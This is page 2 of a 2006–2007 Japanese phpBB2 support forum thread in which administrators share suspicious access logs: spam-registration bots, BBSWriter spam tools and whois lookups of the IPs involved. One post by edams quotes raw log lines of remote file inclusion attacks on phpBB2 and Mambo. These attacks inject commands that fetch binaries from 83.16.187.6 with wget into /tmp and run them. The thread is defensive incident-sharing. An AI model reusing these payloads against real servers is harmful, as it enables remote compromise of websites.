不審なアクセスログ :: phpBB2 日本語サポートフォーラム

最初に読んでね

ダウンロード

検索

ユーザー登録する

連絡

マイストア

ログイン

必読のこと

phpBB2/3 の話題などでお話ししましょう。「便利なMOD見つけた」とか、「良いテーマ発見したよ」などなど。

投稿前に【書込みのルール】を先に読んでください。

開発研究室なんてのもあります。

不審なアクセスログ

ページ直接移動 ≪前のページへ 1, 2

2006.03.09 の刺客な方

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2006/03/09(木) 19:35

コード:

2006 - 3/9 - 18:43:55
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 85.21.86.199
時間閲覧ページ [14]
18:43:55 /phpbb2/
18:44:00 /phpbb2/forum-3.html&sid=649230c085dd9f30cfb5b75e42ecaa43
18:44:05 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:08 /phpbb2/profile.php?mode=register
18:44:10 /phpbb2/profile.php?mode=register&agreed=true
18:44:15 /phpbb2/profile.php
18:44:18 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:20 /phpbb2/login.php
18:44:21 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:24 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:27 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:29 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:32 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3
18:44:34 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=3

http://www.whois.sc/85.21.86.199
CORBINA TELECOM/Internet Network Operations
Range: 85.21.86.192 - 85.21.86.207
CIDR: 85.21.86.192/28

ロシアからの刺客です。

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

私のところもかなり頻繁に攻撃されています

edams

投稿入門者さん

登録日: 2005.06.10

記事: 6

日時: 2006/03/17(金) 12:56

以下私のサーバのログの一部ですが、これらは現在でも有効ですか？　(もしまだ有効なら削除してください)
現在PHPBBは利用していないにもかかわらずPHPBBのセキュリティーホールをつく攻撃が毎日のようにあります
ログの行数が増えるだけで被害にはあっていないのですが　この他にもPHP関連のセキュリティーホールをつく攻撃とみられるものも意外とあります
「mambo」とか「webcalendar」等、まれにdos攻撃もあります
(どうやらダイナミックDNSで運用している自宅サーバに向けめくらめっぽうに攻撃しまくっているようです　自サバの方は御注意を！)

コード:

202.88.179.187 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

/phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|
/phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo|
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo|
/modules/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo|
"GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1"
/index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|

このログで見るとｈttp://83.16.187.6/cmd.datをダウンロードして実行させようとしているみたいです(取り扱いには注意してください)
実はIPをたどり(PROXY経由でした)運よく一人だけ判明したので、所属ISPにたのみ警告していただくよう要請しました
かなり面倒ですが、クラッカー志願者は芽のうちに摘み取りましょう！ (PROXY経由でも生IPがわかるような初心者くらいしか対応できないですけどね)

2006.05.14 ~ 18 の迷惑な方々

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2006/05/18(木) 19:01

コード:

2006年 5月 14日 - 21:08:41
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 220.201.38.3
時間閲覧ページ [6]
21:08:41 /bbs/
21:10:11 /bbs/404.php
21:10:43 /bbs/404.php
21:11:21 /bbs/404.php
21:11:45 /bbs/404.php
21:12:04 /bbs/404.php

http://whois.domaintools.com/220.201.38.3

コード:

2006年 5月 15日 - 01:12:33
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 217.10.38.23
ホスト: n38h23.catv.ext.ru
時間閲覧ページ [4]
01:12:33 /bbs/
01:12:38 /bbs/
01:12:45 /bbs//profile.php?mode=register
01:32:36 /

http://whois.domaintools.com/217.10.38.23

コード:

2006年 5月 15日 - 01:17:18
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 72.21.45.10
ホスト: 10.45.21.72.reverse.layeredtech.com
時間閲覧ページ [12]
01:17:18 /bbs/
01:19:03 /bbs/404.php
01:20:44 /bbs/404.php
01:22:33 /bbs/404.php
01:24:28 /bbs/404.php
01:25:56 /bbs/404.php
01:27:25 /bbs/404.php
01:28:48 /bbs/404.php
01:29:59 /bbs/404.php
01:31:41 /bbs/404.php
01:33:54 /bbs/404.php
01:35:25 /bbs/404.php

http://whois.domaintools.com/72.21.45.10

コード:

2006年 5月 16日 - 00:19:40
OS ブラウザー画面解像度色 IP
? ? ? 217.107.218.202
時間閲覧ページ [30]
00:19:40 /bbs/profile.php?mode=register&agreed=true
00:22:11 /bbs/forum-4.html/phpBB2/profile.php?mode=register&agreed=true
00:27:46 /?phpBB2%2F%E3%82%A4%E3%83%B3%E3%82....php?mode=register&agreed=true
00:27:49 /?phpBB2%2F%E6%97%A5%E6%9C%AC%E8%AA....php?mode=register&agreed=true
00:34:13 /bbs/topic-179-0.html/phpBB2/profile.php?mode=register&agreed=true
00:36:13 /bbs/topic-179.html/phpBB2/profile.php?mode=register&agreed=true
00:40:52 /bbs/topic-215.html/phpBB2/profile.php?mode=register&agreed=true
00:43:30 /bbs/post-1080.html/phpBB2/profile.php?mode=register&agreed=true
00:43:33 /bbs/topic-223.html/phpBB2/profile.php?mode=register&agreed=true
00:44:17 /bbs/post-1079.html/phpBB2/profile.php?mode=register&agreed=true
00:45:39 /?phpBB2%2F%E3%82%AB%E3%82%B9%E3%82....php?mode=register&agreed=true
00:47:42 /bbs/404.php
00:53:00 /bbs/post-745.html/phpBB2/profile.php?mode=register&agreed=true
00:53:03 /bbs/topic-155.html/phpBB2/profile.php?mode=register&agreed=true
00:53:57 /bbs/post-1004.html/phpBB2/profile.php?mode=register&agreed=true
00:58:19 /bbs/post-1072.html/phpBB2/profile.php?mode=register&agreed=true
00:58:55 /bbs/post-1087.html/phpBB2/profile.php?mode=register&agreed=true
00:58:58 /bbs/topic-225.html/phpBB2/profile.php?mode=register&agreed=true
01:00:58 /bbs/post-1022.html/phpBB2/profile.php?mode=register&agreed=true
01:01:02 /bbs/404.php
01:02:49 /?phpBB2%2FFAQ%2F%E3%82%A2%E3%83%90....php?mode=register&agreed=true
01:03:53 /bbs/topic-65.html/phpBB2/profile.php?mode=register&agreed=true
01:03:57 /bbs/post-1046.html/phpBB2/profile.php?mode=register&agreed=true
01:06:58 /bbs/topic-217.html/phpBB2/profile.php?mode=register&agreed=true
01:07:40 /bbs/post-1066.html/phpBB2/profile.php?mode=register&agreed=true
01:10:50 /bbs/post-771.html/phpBB2/profile.php?mode=register&agreed=true
01:12:44 /bbs/post-428.html/phpBB2/profile.php?mode=register&agreed=true
01:12:47 /bbs/topic-214.html/phpBB2/profile.php?mode=register&agreed=true
01:13:22 /?phpBB2%2Fi18n%E7%89%88/phpBB2/profile.php?mode=register&agreed=true
01:13:26 /?phpBB2%2FMOD%2FBBCode/phpBB2/profile.php?mode=register&agreed=true

http://whois.domaintools.com/217.107.218.202

コード:

2006年 5月 16日 - 01:03:38
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 218.11.207.244
時間閲覧ページ [10]
01:03:38 /bbs//profile.php?mode=register&agreed=true
01:04:40 /bbs//profile.php?mode=register&agreed=true
01:06:17 /bbs/404.php
01:07:01 /bbs//profile.php?mode=register&agreed=true
01:08:24 /bbs//
01:12:03 /bbs//profile.php?mode=register&agreed=true
01:15:32 /bbs/404.php
01:15:35 /bbs/404.php
01:17:05 /bbs//profile.php?mode=register&agreed=true
01:20:44 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/218.11.207.244

コード:

2006年 5月 17日 - 04:23:28
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 82.114.69.131
時間閲覧ページ [6]
04:23:28 /bbs//profile.php?mode=register&agreed=true
04:24:34 /bbs//profile.php?mode=register&agreed=true
04:25:36 /bbs/404.php
04:26:50 /bbs//profile.php?mode=register&agreed=true
04:28:43 /bbs/404.php
04:29:07 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/82.114.69.131

コード:

2006年 5月 17日 - 04:31:00
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 72.21.45.10
ホスト: 10.45.21.72.reverse.layeredtech.com
時間閲覧ページ [6]
04:31:00 /bbs/
04:34:42 /bbs//profile.php?mode=register&agreed=true
04:37:26 /bbs/404.php
04:37:41 /bbs//profile.php?mode=register&agreed=true
04:38:28 /bbs/404.php
04:38:53 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/72.21.45.10

コード:

2006年 5月 17日 - 22:44:23
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 72.21.45.10
ホスト: 10.45.21.72.reverse.layeredtech.com
時間閲覧ページ [12]
22:44:23 /bbs/
22:45:20 /bbs/404.php
22:45:47 /bbs/404.php
22:46:23 /bbs/404.php
22:46:54 /bbs/404.php
22:47:36 /bbs/404.php
22:48:01 /bbs/404.php
22:48:32 /bbs/404.php
22:49:04 /bbs/404.php
22:49:46 /bbs/404.php
22:50:25 /bbs/404.php
22:51:04 /bbs/404.php

http://whois.domaintools.com/72.21.45.10

コード:

2006年 5月 18日 - 16:00:25
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 72.21.45.10
ホスト: 10.45.21.72.reverse.layeredtech.com
時間閲覧ページ [11]
16:00:25 /bbs/404.php
16:00:44 /bbs//profile.php?mode=register&agreed=true
16:00:51 /bbs/404.php
16:01:14 /bbs//profile.php?mode=register&agreed=true
16:01:23 /bbs/404.php
16:01:58 /bbs//profile.php?mode=register&agreed=true
16:02:22 /bbs/404.php
16:02:44 /bbs//profile.php?mode=register&agreed=true
16:02:52 /bbs/404.php
16:03:04 /bbs//profile.php?mode=register&agreed=true
16:03:25 /bbs/404.php

http://whois.domaintools.com/72.21.45.10

phpBB2 ルートの後に // とダブらせて profile.php?mode=register&agreed=true にアクセスしてきています。

また、phpBB2 らしき URL のいちばん後に（機械的に） /phpBB2/profile.php?mode=register&agreed=true と付加して（見境なく）アクセスしてきてユーザー登録を試みています。
ちなみに、ウチのサイトでの /?phpBB2 は、PukiWiki であります。

/404.php となってるのは、存在しないファイルにアタックしてきているという意味です。
404 File Not Found の誘導先にしています。

layeredtech.com という処は ISP かナニかの会社のようですが、ココの利用者がスパム投稿あるいはスパムユーザー登録を頻繁にやってるようです。

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

2006.05.19 ~ 21 の迷惑な方々

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2006/05/22(月) 00:25

コード:

2006年 5月 19日 - 08:45:58
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 61.39.139.200
時間閲覧ページ [2]
08:45:58 /bbs//profile.php?mode=register&agreed=true
08:46:13 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/61.39.139.200

コード:

2006年 5月 19日 - 21:08:36
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 210.183.193.78
時間閲覧ページ [2]
21:08:36 /bbs//profile.php?mode=register&agreed=true
21:08:50 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/210.183.193.78

引　用:

2006年 5月 20日 - 09:02:08
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 211.153.44.155
時間閲覧ページ [12]
09:02:08 /bbs//profile.php?mode=register&agreed=true
09:02:32 /bbs//profile.php?mode=register&agreed=true
09:03:01 /bbs/404.php
09:03:24 /bbs//profile.php?mode=register&agreed=true
09:04:10 /bbs/404.php
09:04:25 /bbs//profile.php?mode=register&agreed=true
09:04:52 /bbs/404.php
09:05:01 /bbs//profile.php?mode=register&agreed=true
09:05:17 /bbs/404.php
09:05:31 /bbs//profile.php?mode=register&agreed=true
09:05:42 /bbs/404.php
09:05:51 /bbs//profile.php?mode=register&agreed=true

http://whois.domaintools.com/211.153.44.155

コード:

2006年 5月 20日 - 16:55:02
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 196.12.128.98
時間閲覧ページ [1]
16:55:02 /bbs/profile.php?mode=register&agreed=true

http://whois.domaintools.com/196.12.128.98

コード:

2006年 5月 20日 - 21:46:50
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 219.232.9.180
時間閲覧ページ [11]
21:46:50 /bbs//profile.php?mode=register&agreed=true
21:47:45 /bbs//profile.php?mode=register&agreed=true
21:48:46 /bbs/404.php
21:49:01 /bbs//index.php
21:50:19 /bbs//profile.php?mode=register&agreed=true
21:52:20 /bbs/404.php
21:52:45 /bbs//profile.php?mode=register&agreed=true
21:53:35 /bbs/404.php
21:53:56 /bbs//profile.php?mode=register&agreed=true
21:54:23 /bbs/404.php
21:55:14 /bbs/

http://whois.domaintools.com/219.232.9.180
ボットを放ってから、巧くいったかどうかを TOP で確認してるんか？

コード:

2006年 5月 21日 - 08:59:33
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 195.225.176.74
時間閲覧ページ [2]
08:59:33 /bbs/post-1046.html/phpBB2/
08:59:55 /bbs/post-1046.html/phpBB2/posting.php

http://whois.domaintools.com/195.225.176.74

▼別のトコ

コード:

2006年 5月 21日 - 06:12:00
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 218.107.238.36
言語: 英語/U.S
時間閲覧ページ [1]
06:12:00 /profile.php?mode=register&agreed=true

2006年 5月 21日 - 09:02:18
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 194.83.172.2
言語: 英語/U.S
時間閲覧ページ [1]
09:02:18 /profile.php?mode=register&agreed=true

2006年 5月 21日 - 11:52:53
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 68.189.112.58
言語: 英語/U.S
ホスト: email.svnewspapers.com
時間閲覧ページ [1]
11:52:53 /profile.php?mode=register&agreed=true

http://whois.domaintools.com/218.107.238.36
http://whois.domaintools.com/194.83.172.2
http://whois.domaintools.com/68.189.112.58
おそらく、同じヤツが。

コード:

2006年 5月 21日 - 12:21:25
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 209.241.144.111
言語: 英語
時間閲覧ページ [1]
12:21:25 /posting.php

2006年 5月 21日 - 12:25:10
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 220.118.165.240
言語: 英語
時間閲覧ページ [1]
12:25:10 /posting.php

http://whois.domaintools.com/209.241.144.111
http://whois.domaintools.com/220.118.165.240
これもおそらく、同じヤツが。

コード:

2006年 5月 21日 - 16:46:10
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 83.160.239.46
言語: 英語/U.S
ホスト: as-sciarone.demon.nl
時間閲覧ページ [1]
16:46:10 /profile.php?mode=register&agreed=true

2006年 5月 21日 - 19:56:10
OS ブラウザー画面解像度色 IP
Windows 2000 Explorer 6.0 ? 194.83.172.2
言語: 英語/U.S
時間閲覧ページ [1]
19:56:10 /profile.php?mode=register&agreed=true

http://whois.domaintools.com/83.160.239.46
http://whois.domaintools.com/194.83.172.2
コレらも同じヤツか？

コード:

2006年 5月 21日 - 22:00:58
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 222.110.247.70
時間閲覧ページ [1]
22:00:58 /profile.php?mode=register&agreed=true

http://whois.domaintools.com/222.110.247.70

コード:

2006年 5月 21日 - 23:30:01
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 58.72.80.208
言語: 英語
時間閲覧ページ [1]
23:30:01 /posting.php

2006年 5月 21日 - 23:30:08
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 218.154.81.61
言語: 英語
時間閲覧ページ [1]
23:30:08 /posting.php

2006年 5月 21日 - 23:30:14
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 82.138.54.66
言語: 英語
時間閲覧ページ [1]
23:30:14 /posting.php

http://whois.domaintools.com/58.72.80.208
http://whois.domaintools.com/218.154.81.61
http://whois.domaintools.com/82.138.54.66
コレらはおそらく、同じヤツであろう。
で、ソレら前後に興味深いログあり。▼コイツの仕業か？

コード:

2006年 5月 21日 - 23:29:39
OS ブラウザー画面解像度色 IP
Windows XP Explorer 6.0 ? 83.97.111.111
言語: 英語
時間閲覧ページ [4]
23:29:39 /post-792.html&sid=e630d34e312d570341309c0c87153d35
23:30:03 /post-792.html&sid=e630d34e312d570341309c0c87153d35
23:30:10 /post-792.html&sid=e630d34e312d570341309c0c87153d35
23:30:18 /post-792.html&sid=e630d34e312d570341309c0c87153d35

http://whois.domaintools.com/83.97.111.111

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

BBSWriter ご来訪

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2006/11/11(土) 12:49

BBSWriter を使う人って居てはるんですなあ。

CrackerTracker log

コード:

Date / Time IP Referrer User Agent
10.11.2006, 23:22 125.30.9.71 BBSWriter
10.11.2006, 23:22 125.30.9.71 BBSWriter
10.11.2006, 23:11 61.12.156.97 BBSWriter
10.11.2006, 23:11 61.12.156.97 BBSWriter
10.11.2006, 23:06 220.100.225.226 BBSWriter
10.11.2006, 23:06 220.100.225.226 BBSWriter
10.11.2006, 23:05 220.100.225.226 BBSWriter
10.11.2006, 23:05 220.100.225.226 BBSWriter
10.11.2006, 22:53 220.150.112.104 BBSWriter
10.11.2006, 22:53 220.150.112.104 BBSWriter
10.11.2006, 22:53 220.150.112.104 BBSWriter
10.11.2006, 22:53 220.150.112.104 BBSWriter
10.11.2006, 22:53 220.150.112.104 BBSWriter
10.11.2006, 22:52 220.150.112.104 BBSWriter
10.11.2006, 22:52 220.150.112.104 BBSWriter
10.11.2006, 22:52 220.150.112.104 BBSWriter

access log

コード:

2006年 11月 10日 - 23:22:39
OS ブラウザー画面解像度色 IP
? ? ? 125.30.9.71
ホスト: 71.9.30.125.dy.iij4u.or.jp
時間閲覧ページ [11]
23:22:39 /bbs/viewtopic.php?p=1893
23:22:40 /bbs/viewtopic.php?p=1893
23:22:40 /bbs/viewtopic.php?p=1893
23:22:41 /bbs/viewtopic.php?p=1893
23:22:42 /bbs/viewtopic.php?p=1893
23:22:42 /bbs/viewtopic.php?p=1893
23:22:46 /bbs/viewtopic.php?p=1893
23:22:47 /bbs/viewtopic.php?p=1893
23:22:52 /bbs/viewtopic.php?p=1893
23:22:52 /bbs/login.php?redirect=posting.php&mode=reply&t=361
23:22:53 /bbs/viewtopic.php?p=1893

2006年 11月 10日 - 23:11:55
OS ブラウザー画面解像度色 IP
? 61.12.156.97
時間閲覧ページ [10]
23:11:55 /bbs/viewtopic.php?p=1883
23:11:55 /bbs/viewtopic.php?p=1883
23:11:56 /bbs/viewtopic.php?p=1883
23:11:57 /bbs/viewtopic.php?p=1883
23:11:57 /bbs/viewtopic.php?p=1883
23:11:58 /bbs/viewtopic.php?p=1883
23:11:59 /bbs/viewtopic.php?p=1883
23:12:00 /bbs/viewtopic.php?p=1883
23:12:11 /bbs/viewtopic.php?p=1883
23:12:11 /bbs/login.php?redirect=posting.php&mode=reply&t=362

2006年 11月 10日 - 23:05:01
OS ブラウザー画面解像度色 IP
? ? ? 220.100.225.226
ホスト: 226.225.100.220.dy.bbexcite.jp
時間閲覧ページ [18]
23:05:01 /bbs/contact_form.php
23:05:04 /bbs/contact_form.php
23:05:05 /bbs/contact_form.php
23:05:06 /bbs/contact_form.php
23:05:07 /bbs/contact_form.php
23:05:08 /bbs/contact_form.php
23:05:10 /bbs/contact_form.php
23:05:10 /bbs/contact_form.php
23:05:34 /bbs/contact_form.php
23:05:41 /bbs/contact_form.php
23:05:49 /bbs/viewtopic.php?p=1873
23:05:54 /bbs/viewtopic.php?p=1873
23:05:59 /bbs/viewtopic.php?p=1873
23:06:07 /bbs/viewtopic.php?p=1873
23:06:12 /bbs/viewtopic.php?p=1873
23:06:15 /bbs/viewtopic.php?p=1873
23:06:18 /bbs/viewtopic.php?p=1873
23:06:19 /bbs/viewtopic.php?p=1873

2006年 11月 10日 - 22:52:37
OS ブラウザー画面解像度色 IP
? ? ? 220.150.112.104
ホスト: 104.112.150.220.ap.zero-isp.NET
時間閲覧ページ [45]
22:52:37 /bbs/topic-312.html
22:52:38 /bbs/topic-312.html
22:52:38 /bbs/topic-312.html
22:52:39 /bbs/topic-312.html
22:52:40 /bbs/topic-312.html
22:52:40 /bbs/topic-312.html
22:52:41 /bbs/topic-312.html
22:52:41 /bbs/topic-312.html
22:52:45 /bbs/topic-312.html
22:52:46 /bbs/login.php?redirect=posting.php&mode=reply&t=312
22:52:47 /bbs/login.php?redirect=posting.php&mode=reply&t=312
22:52:52 /bbs/topic-312.html
22:52:55 /bbs/viewtopic.php?p=1874
22:52:56 /bbs/viewtopic.php?p=1874
22:52:58 /bbs/viewtopic.php?p=1874
22:53:00 /bbs/viewtopic.php?p=1874
22:53:00 /bbs/viewtopic.php?p=1874
22:53:01 /bbs/viewtopic.php?p=1874
22:53:02 /bbs/viewtopic.php?p=1874
22:53:03 /bbs/viewtopic.php?p=1874
22:53:17 /bbs/login.php?redirect=posting.php&mode=reply&t=334
22:53:17 /bbs/viewtopic.php?p=1874
22:53:22 /bbs/viewtopic.php?p=1874
22:53:28 /bbs/viewtopic.php?p=1884
22:53:29 /bbs/viewtopic.php?p=1884
22:53:30 /bbs/viewtopic.php?p=1884
22:53:31 /bbs/viewtopic.php?p=1884
22:53:32 /bbs/viewtopic.php?p=1884
22:53:33 /bbs/viewtopic.php?p=1884
22:53:33 /bbs/viewtopic.php?p=1884
22:53:34 /bbs/viewtopic.php?p=1884
22:53:40 /bbs/login.php?redirect=posting.php&mode=reply&t=361
22:53:40 /bbs/viewtopic.php?p=1884
22:53:41 /bbs/viewtopic.php?p=1884
22:53:44 /bbs/viewtopic.php?p=1894
22:53:44 /bbs/viewtopic.php?p=1894
22:53:45 /bbs/viewtopic.php?p=1894
22:53:46 /bbs/viewtopic.php?p=1894
22:53:49 /bbs/viewtopic.php?p=1894
22:53:50 /bbs/viewtopic.php?p=1894
22:53:51 /bbs/viewtopic.php?p=1894
22:53:52 /bbs/viewtopic.php?p=1894
22:53:56 /bbs/viewtopic.php?p=1894
22:53:56 /bbs/login.php?redirect=posting.php&mode=reply&t=361
22:54:00 /bbs/viewtopic.php?p=1894

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

Re: BBSWriter ご来訪

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2006/11/12(日) 10:49

今朝も来られたようです。なんぼやってもムダなんですがね。

CrackerTracker log

コード:

Date / Time IP Referrer User Agent
12.11.2006, 08:03 220.150.112.104 BBSWriter
12.11.2006, 08:02 220.150.112.104 BBSWriter
12.11.2006, 08:02 220.150.112.104 BBSWriter
12.11.2006, 08:01 220.150.112.104 BBSWriter
12.11.2006, 08:01 220.150.112.104 BBSWriter
12.11.2006, 08:00 220.150.112.104 BBSWriter
12.11.2006, 08:00 220.150.237.118 BBSWriter
12.11.2006, 07:59 220.150.237.118 BBSWriter
12.11.2006, 07:55 220.150.237.118 BBSWriter
12.11.2006, 07:55 220.150.237.118 BBSWriter
12.11.2006, 07:54 219.111.61.218 BBSWriter
12.11.2006, 07:53 219.111.61.218 BBSWriter
12.11.2006, 07:53 219.111.61.218 BBSWriter
12.11.2006, 07:53 219.111.61.218 BBSWriter
12.11.2006, 07:52 219.111.61.218 BBSWriter
12.11.2006, 07:52 219.111.61.218 BBSWriter
12.11.2006, 07:52 219.111.61.218 BBSWriter
12.11.2006, 07:52 219.111.61.218 BBSWriter
12.11.2006, 07:51 219.111.61.218 BBSWriter
12.11.2006, 07:51 219.111.61.218 BBSWriter
12.11.2006, 07:31 61.12.159.3 BBSWriter
12.11.2006, 07:31 61.12.159.3 BBSWriter
12.11.2006, 07:30 219.111.61.88 BBSWriter
12.11.2006, 07:30 219.111.61.88 BBSWriter
12.11.2006, 07:29 219.111.61.88 BBSWriter
12.11.2006, 07:29 219.111.61.88 BBSWriter
12.11.2006, 06:21 61.12.159.3 BBSWriter
12.11.2006, 06:21 61.12.159.3 BBSWriter
12.11.2006, 06:20 61.12.159.3 BBSWriter
12.11.2006, 06:20 61.12.159.3 BBSWriter
12.11.2006, 06:19 61.12.159.3 BBSWriter
12.11.2006, 06:19 61.12.159.3 BBSWriter
12.11.2006, 05:18 125.30.8.106 BBSWriter
12.11.2006, 05:18 125.30.8.106 BBSWriter
12.11.2006, 05:18 220.150.112.104 BBSWriter
12.11.2006, 05:18 220.150.112.104 BBSWriter
12.11.2006, 05:17 220.150.112.104 BBSWriter
12.11.2006, 05:17 220.150.112.104 BBSWriter
12.11.2006, 05:17 220.150.112.104 BBSWriter
12.11.2006, 05:17 220.150.112.104 BBSWriter
12.11.2006, 04:40 219.111.126.198 BBSWriter
12.11.2006, 04:40 219.111.126.198 BBSWriter
12.11.2006, 04:39 219.111.126.198 BBSWriter
12.11.2006, 04:39 219.111.126.198 BBSWriter
12.11.2006, 04:38 219.111.126.198 BBSWriter
12.11.2006, 04:38 219.111.126.198 BBSWriter
12.11.2006, 04:37 219.111.126.198 BBSWriter
12.11.2006, 04:37 219.111.126.198 BBSWriter

最初、IPは偽装かと思ったんですが、すべて日本国内からのようです。

http://whois.domaintools.com/220.150.237.118
118.237.150.220.ap.gmo-access.jp
220.150.0.0 - 220.150.255.255

http://whois.domaintools.com/61.12.159.3
3.159.12.61.ap.gmo-access.jp
61.12.128.0 - 61.12.191.255
または、
61.12.128.0 - 61.12.255.255

http://whois.domaintools.com/219.111.61.88
88.61.111.219.dy.bbexcite.jp
219.111.0.0 - 219.111.127.255
または、
219.96.0.0 - 219.127.255.255

http://whois.domaintools.com/125.30.8.106
106.8.30.125.dy.iij4u.or.jp
125.30.0.0 - 125.30.127.255
または、
125.30.0.0 - 125.30.255.255

http://whois.domaintools.com/220.150.112.104
104.112.150.220.ap.zero-isp.NET
220.150.0.0 - 220.150.255.255

http://whois.domaintools.com/219.111.126.198
198.126.111.219.dy.bbexcite.jp
219.96.0.0 - 219.127.255.255

GMO を代表に FreeBit（yournet）などは BBS spammer、Email spammer が非常に多いので、弾いた方がイイと思ってます。

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

Microsoft URL Control

hiikun

あどみん

登録日: 2005.03.16

記事: 830

所在地: 大阪府

日時: 2007/01/12(金) 23:16

昨日今日と Microsoft URL Control - 6.00.8862 なるUAが徘徊しておりました。
BBS にスパム投稿を試みるアプリのようです。

ちなみに両日とも、同じ輩によるモノ。ご参考にどうぞ。▼

コード:

IP: 219.21.148.33
HOST: softbank219021148033.bbtec.net

_________________ ■ 【ニューリリース】2.0.23/3.0.0 マイホーム｜ノート｜アイテム探索｜小都市 ■

不審なアクセスログ

新規投稿: 不可
返信投稿: 不可
記事編集: 不可
記事削除: 不可
投票参加: 不可
添付アップロード: 不可
添付ダウンロード: 不可

All times are GMT + 9 Hours (JST)
Page 2 of 2

ページ直接移動 ≪前のページへ 1, 2

2819 Attacks blocked

Powered by phpBB © phpBB Group
Design by phpBBStyles.com | Styles Database.
Traduction par : PHPBB JAPAN / UTF-8 i18n Edition : JP Support Forum
Content © phpBB2 日本語サポートフォーラム
[ Debug on | page generation = 0.59180 seconds | sql queries = 19 ]